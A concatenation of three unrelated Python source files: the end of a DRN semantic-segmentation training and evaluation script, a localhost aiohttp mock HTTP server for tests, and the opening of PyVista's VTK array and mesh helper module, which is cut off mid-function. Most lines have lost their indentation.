print("=> no checkpoint found at '{}'".format(args.resume))
if args.evaluate:
validate(val_loader, model, criterion, eval_score=accuracy)
return
for epoch in range(start_epoch, args.epochs):
lr = adjust_learning_rate(args, optimizer, epoch)
logger.info('Epoch: [{0}]\tlr {1:.06f}'.format(epoch, lr))
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch,
eval_score=accuracy)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
checkpoint_path = os.path.join(args.save_path, 'checkpoint_latest.pth.tar')
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=checkpoint_path)
if (epoch + 1) % args.save_iter == 0:
history_path = os.path.join(args.save_path, 'checkpoint_{:03d}.pth.tar'.format(epoch + 1))
shutil.copyfile(checkpoint_path, history_path)
def adjust_learning_rate(args, optimizer, epoch):
"""
Sets the learning rate to the initial LR decayed by 10 every 30 epochs
"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
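# A hedged worked example of the two schedules above: with lr=0.01 and
# step=30, 'step' mode gives 0.01 for epochs 0-29, 0.001 for 30-59, and so on,
# while 'poly' mode decays smoothly towards zero over args.epochs.
def _example_lr_schedule(lr=0.01, epochs=100, step=30, epoch=45):
    step_lr = lr * (0.1 ** (epoch // step))     # 0.001 at epoch 45
    poly_lr = lr * (1 - epoch / epochs) ** 0.9  # roughly 0.0058 at epoch 45
    return step_lr, poly_lr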
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
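# A hedged worked example with tiny made-up arrays: fast_hist builds an n x n
# confusion matrix (rows = ground truth, columns = prediction) and
# per_class_iu turns it into per-class intersection-over-union.
def _example_iou():
    label = np.array([0, 0, 1, 1])
    pred = np.array([0, 1, 1, 1])
    hist = fast_hist(pred, label, n=2)
    # hist == [[1, 1], [0, 2]]: one correct 0, one 0 predicted as 1, two correct 1s
    return per_class_iu(hist)  # class 0: 1/2, class 1: 2/3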
def save_output_images(predictions, filenames, output_dir):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, 'LABELS', filenames[ind][:-4].split("/")[-1] + '_trainIds.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, 'COLOR', filenames[ind][:-4].split("/")[-1] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def test(eval_data_loader, model, num_classes,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
for iter, (image, label, name) in enumerate(eval_data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
image_var = Variable(image, requires_grad=False)
final = model(image_var)[0]
_, pred = torch.max(final, 1)
pred = pred.cpu().data.numpy()
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(
pred, name, output_dir,
TRIPLET_PALETTE if num_classes == 3 else CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
def test_ms(eval_data_loader, model, num_classes, scales,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
num_scales = len(scales)
for iter, input_data in enumerate(eval_data_loader):
data_time.update(time.time() - end)
if has_gt:
name = input_data[2]
label = input_data[1]
else:
name = input_data[1]
h, w = input_data[0].size()[2:4]
images = [input_data[0]]
images.extend(input_data[-num_scales:])
# pdb.set_trace()
outputs = []
for image in images:
with torch.no_grad():
image_var = Variable(image, requires_grad=False)
final = model(image_var)[0]
outputs.append(final.data)
final = sum([resize_4d_tensor(out, w, h) for out in outputs])
# _, pred = torch.max(torch.from_numpy(final), 1)
# pred = pred.cpu().numpy()
pred = final.argmax(axis=1)
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def test_seg(args):
batch_size = args.batch_size
num_workers = args.workers
phase = args.phase
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, pretrained_model=None,
pretrained=False)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'], std=info['std'])
scales = [0.5, 0.75, 1.25, 1.5, 1.75]
if args.ms:
dataset = SegListMS(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), scales, list_dir=args.list_dir)
else:
dataset = SegList(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), list_dir=args.list_dir, out_name=True)
test_loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=False
)
cudnn.benchmark = True
# optionally resume from a checkpoint
start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
logger.info("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
logger.info("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
logger.info("=> no checkpoint found at '{}'".format(args.resume))
# out_dir = '{}_{:03d}_{}'.format(args.arch, start_epoch, phase)
out_dir = args.save_path
if len(args.test_suffix) > 0:
out_dir += '/' + args.test_suffix
if args.ms:
out_dir += '_ms'
if args.ms:
mAP = test_ms(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt,
output_dir=out_dir,
scales=scales)
else:
mAP = test(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt, output_dir=out_dir)
if mAP is not None:
logger.info('mAP: %f', mAP)
def parse_args():
# Training settings
parser = argparse.ArgumentParser(description='')
parser.add_argument('cmd', choices=['train', 'test'])
parser.add_argument('-d', '--data-dir', default=None, required=True)
parser.add_argument('-l', '--list-dir', default=None,
                        help='List dir to look for train_images.txt etc. '
                             'It is the same as --data-dir if not set.')
parser.add_argument('-c', '--classes', default=0, type=int)
parser.add_argument('-s', '--crop-size', default=0, type=int)
parser.add_argument('--step', type=int, default=200)
parser.add_argument('--arch')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--lr-mode', type=str, default='step')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('-e', '--evaluate', dest='evaluate',
action='store_true',
help='evaluate model on validation set')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--pretrained', dest='pretrained',
default='', type=str, metavar='PATH',
help='use pre-trained model')
parser.add_argument('--save_path', default='', type=str, metavar='PATH',
help='output path for training checkpoints/output images')
parser.add_argument('--save_iter', default=1, type=int,
                        help='number of training iterations between '
                             'checkpoint history saves')
parser.add_argument('-j', '--workers', type=int, default=8)
parser.add_argument('--load-release', dest='load_rel', default=None)
parser.add_argument('--phase', default='val')
parser.add_argument('--random-scale', default=0, type=float)
parser.add_argument('--random-rotate', default=0, type=int)
parser.add_argument('--bn-sync', action='store_true')
parser.add_argument('--ms', action='store_true',
help='Turn on multi-scale testing')
parser.add_argument('--with-gt', action='store_true')
parser.add_argument('--test-suffix', default='', type=str)
args = parser.parse_args()
assert args.classes > 0
print(' '.join(sys.argv))
print(args)
if args.bn_sync:
drn.BatchNorm = batchnormsync.BatchNormSync
return args
def main():
args = parse_args()
if args.cmd == 'train':
train_seg(args)
elif args.cmd == 'test':
test_seg(args)
if __name__ == '__main__':
main()
|
testserver.py
|
import socket
import asyncio
import threading
import time
from json import dumps
from aiohttp import web
class Response(web.Response):
def __init__(self, *, json=None, **kwargs):
if json is not None:
text = dumps(json)
content_type = "application/json"
kwargs.update(text=text, content_type=content_type)
super().__init__(**kwargs)
class HandlerBuilder:
def __init__(self):
self.response = web.HTTPOk()
self.delay = 0
self.path = None
self.method = None
def with_response(self, response: web.Response):
self.response = response
return self
def with_delay(self, delay: float):
self.delay = delay
return self
def with_path(self, path: str):
self.path = path
return self
def with_method(self, method: str):
self.method = method
return self
class TestHttpServer:
def __init__(self, host=None, port=None):
self._host = host or "localhost"
self._port = port or self._find_free_port()
self._ready = threading.Semaphore(0)
self._enqueued = []
self._thread = None
self._loop = None
self._app = None
self._app_runner = None
@property
def host(self):
return self._host
@property
def port(self):
return self._port
def start(self):
self._loop = asyncio.new_event_loop()
self._app = web.Application(loop=self._loop)
self._app.add_routes([web.route("*", "/{tail:.*}", self._handle)])
self._app_runner = web.AppRunner(self._app)
self._thread = threading.Thread(target=self._run_loop)
self._thread.daemon = True
self._thread.start()
self._ready.acquire()
def stop(self):
        asyncio.run_coroutine_threadsafe(self._app_runner.shutdown(), self._loop).result()
        asyncio.run_coroutine_threadsafe(self._app_runner.cleanup(), self._loop).result()
        self._loop.call_soon_threadsafe(self._loop.stop)
self._thread.join()
self._loop.close()
self._thread = None
self._loop = None
self._app = None
self._app_runner = None
def enqueue(self, response: web.Response) -> HandlerBuilder:
handler_builder = HandlerBuilder().with_response(response)
self._enqueued.append(handler_builder)
return handler_builder
def reset(self):
self._enqueued = []
    async def _handle(self, request: web.Request) -> web.Response:
def match_path(handler_, request_):
return handler_.path is None or handler_.path == request_.path
def match_method(handler_, request_):
return handler_.method is None or handler_.method == "*" or \
str(handler_.method).lower() == str(request_.method).lower()
matching_handlers = [
(idx, handler)
for idx, handler in enumerate(self._enqueued)
if match_path(handler, request) and match_method(handler, request)
]
        if not matching_handlers:
            raise AssertionError(
                "no enqueued response matches {} {}".format(request.method, request.path))
idx, handler = matching_handlers[0]
self._enqueued.pop(idx)
        if handler.delay is not None and handler.delay > 0:
            await asyncio.sleep(handler.delay)
        return handler.response
def _run_loop(self):
self._loop.run_until_complete(self._app_runner.setup())
site = web.TCPSite(self._app_runner, host=self._host, port=self._port)
self._loop.run_until_complete(site.start())
self._ready.release()
self._loop.run_forever()
def _find_free_port(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
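# A hedged usage sketch (assumes the ``requests`` package is available):
# enqueue one JSON reply, hit the server once, then shut it down.
def _example_test_server_usage():
    import requests  # example-only dependency
    server = TestHttpServer()
    server.start()
    server.enqueue(Response(json={"ok": True})).with_path("/ping").with_method("GET")
    reply = requests.get("http://{}:{}/ping".format(server.host, server.port)).json()
    server.stop()
    return reply  # {"ok": True}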
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import collections.abc
import enum
import logging
import signal
import sys
import warnings
from threading import Thread
import threading
import traceback
import numpy as np
import scooby
import vtk
import vtk.util.numpy_support as nps
import pyvista
from .fileio import from_meshio
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a give python data type.
Corrects for string type mapping issues.
Returns
-------
int : the integer type id specified in vtkType.h
"""
typ = nps.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array."""
vtkarr = vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array."""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Note that this is terribly inefficient - inefficient support
is better than no support :). If you have ideas on how to make this faster,
please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=0, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
    Parameters
    ----------
    arr : ndarray or vtkDataArray
        A numpy array or vtkDataArray to convert.
name : str
The name of the data array for VTK
deep : bool
if input is numpy array then deep copy values
Returns
-------
    vtkDataArray or ndarray
        The converted array: a NumPy ``ndarray`` input returns a
        ``vtkDataArray``, and a ``vtkDataArray`` (or ``vtkStringArray`` /
        ``vtkBitArray``) input returns a NumPy ``ndarray``.
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = nps.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (vtk.vtkDataArray, vtk.vtkBitArray, vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, vtk.vtkStringArray):
return convert_string_array(arr)
    # Convert from vtkDataArray to NumPy
return nps.vtk_to_numpy(arr)
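# A hedged usage sketch: round-trip a small NumPy array through VTK and back.
def _example_convert_array_roundtrip():
    arr = np.array([1.0, 2.0, 3.0])
    vtk_arr = convert_array(arr, name='example')  # ndarray -> vtkDataArray
    back = convert_array(vtk_arr)                 # vtkDataArray -> ndarray
    return back  # array([1., 2., 3.])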
def is_pyvista_dataset(obj):
"""Return True if the Object is a PyVista wrapped dataset."""
return isinstance(obj, (pyvista.Common, pyvista.MultiBlock))
def point_array(mesh, name):
"""Return point array of a vtk object."""
vtkarr = mesh.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_array(mesh, name):
"""Return field array of a vtk object."""
vtkarr = mesh.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_array(mesh, name):
"""Return cell array of a vtk object."""
vtkarr = mesh.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def row_array(data_object, name):
"""Return row array of a vtk object."""
vtkarr = data_object.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return the id of the given field."""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r',]:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', info=False, err=False):
"""Search point, cell and field data for an array.
Parameters
----------
name : str
The name of the array to get the range.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``
info : bool
Return info about the array rather than the array itself.
err : bool
Boolean to control whether to throw an error if array is not present.
"""
if isinstance(mesh, vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
field = FieldAssociation.ROW
if info:
return arr, field
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if np.sum([parr is not None, carr is not None, farr is not None]) > 1:
if preference == FieldAssociation.CELL:
if info:
return carr, FieldAssociation.CELL
else:
return carr
elif preference == FieldAssociation.POINT:
if info:
return parr, FieldAssociation.POINT
else:
return parr
elif preference == FieldAssociation.NONE:
if info:
return farr, FieldAssociation.NONE
else:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
arr = None
field = None
if parr is not None:
arr = parr
field = FieldAssociation.POINT
elif carr is not None:
arr = carr
field = FieldAssociation.CELL
elif farr is not None:
arr = farr
field = FieldAssociation.NONE
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
if info:
return arr, field
return arr
def vtk_points(points, deep=True):
"""Convert numpy points to a vtkPoints object."""
if not points.flags['C_CONTIGUOUS']:
points = np.ascontiguousarray(points)
vtkpts = vtk.vtkPoints()
vtkpts.SetData(nps.numpy_to_vtk(points, deep=deep))
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
    Assumes points are ordered as line segments and that an even number of
    points is given.
Parameters
----------
points : np.ndarray
Points representing line segments. An even number must be given as
every two vertices represent a single line segment. For example, two
line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
Examples
--------
    This example plots two line segments at right angles to each other.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
    >>> lines = pyvista.line_segments_from_points(points)
>>> lines.plot() # doctest:+SKIP
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected segments. For
example, two line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
close : bool, optional
If True, close the line segments into a loop
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0],], axis=0)
poly.lines = cells
return poly
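# Illustrative usage sketch (not part of the original module): connect three
# points into a polyline and close it into a triangular loop.
def _example_lines_from_points():  # pragma: no cover - illustrative only
    pts = np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0]])
    loop = lines_from_points(pts, close=True)
    return loop   # PolyData with three line cells (two segments plus the closing one)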
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape (N, 3) storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape (M, 3) containing the triangle
indices.
Returns
-------
tri_mesh : pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista as pv
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
    >>> tri_mesh = pv.make_tri_mesh(points, faces)
>>> tri_mesh.plot(show_edges=True) # doctest:+SKIP
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a vtkPolyData object composed of vectors."""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = vtk.vtkPoints()
vpts.SetData(nps.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to a ``numpy.ndarray``.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
"""
if isinstance(matrix, vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError('Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.')
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = vtk.vtkMatrix4x4()
else:
raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
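# Illustrative round-trip sketch (not part of the original module): a 4x4
# transform converted to ``vtk.vtkMatrix4x4`` and back should be unchanged.
def _example_matrix_roundtrip():  # pragma: no cover - illustrative only
    transform = np.diag([2.0, 2.0, 2.0, 1.0])   # uniform scaling transform
    vtkmat = vtkmatrix_from_array(transform)    # -> vtk.vtkMatrix4x4
    recovered = array_from_vtkmatrix(vtkmat)    # -> numpy.ndarray of shape (4, 4)
    assert np.allclose(recovered, transform)
    return vtkmat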
def is_meshio_mesh(mesh):
"""Test if passed object is instance of ``meshio.Mesh``."""
try:
import meshio
return isinstance(mesh, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
wrapped_dataset : pyvista class
The `pyvista` wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
    N Points: 1
    X Bounds: 1.000e+00, 1.000e+00
    Y Bounds: 2.000e+00, 2.000e+00
    Z Bounds: 3.000e+00, 3.000e+00
N Arrays: 0
"""
wrappers = {
'vtkUnstructuredGrid': pyvista.UnstructuredGrid,
